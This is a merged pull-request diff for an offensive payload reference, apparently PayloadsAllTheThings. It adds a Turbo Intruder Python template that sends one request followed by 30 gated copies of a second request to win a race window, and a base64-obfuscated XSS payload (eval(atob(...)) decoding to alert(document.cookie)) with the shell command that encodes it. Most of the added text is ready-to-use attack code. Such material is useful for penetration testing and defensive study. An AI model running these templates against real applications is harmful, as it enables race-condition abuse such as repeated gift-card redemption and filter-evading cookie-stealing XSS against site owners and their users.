Merge pull request swisskyrepo#460 from idealphase/master

Update XSS README.md & Update Race Condition README.md

Race Condition/README.md

@@ -41,9 +41,40 @@
 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder
 4. Click "Attack"
 
+## Turbo Intruder 2 Requests Examples
+This follwoing template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds.
+```python
+def queueRequests(target, wordlists): 
+    engine = RequestEngine(endpoint=target.endpoint, 
+                           concurrentConnections=30, 
+                           requestsPerConnection=100, 
+                           pipeline=False 
+                           ) 
+    request1 = '''
+POST /target-URI-1 HTTP/1.1
+Host: <REDACTED>
+Cookie: session=<REDACTED>
+
+parameterName=parameterValue
+    ''' 
+
+    request2 = '''
+GET /target-URI-2 HTTP/1.1
+Host: <REDACTED>
+Cookie: session=<REDACTED>
+    '''
+
+    engine.queue(request1, gate='race1')
+    for i in range(30): 
+        engine.queue(request2, gate='race1') 
+    engine.openGate('race1') 
+    engine.complete(timeout=60) 
+def handleResponse(req, interesting): 
+    table.add(req)
+```
 
 ## References
 
 * [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247)
 * [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)
-* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)
+* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)

XSS Injection/README.md

@@ -663,6 +663,12 @@ You can bypass a single quote with ' in an on mousedown event handler
 Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777`
 http://www.geektools.com/cgi-bin/ipconv.cgi
 
+```javascript
+<script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
+```
+
+Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==`
+
 ### Bypass parenthesis for string
 
 ```javascript
@@ -1249,3 +1255,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
 - [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
 - [Bypass < with ＜](https://hackerone.com/reports/639684)
+- [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code)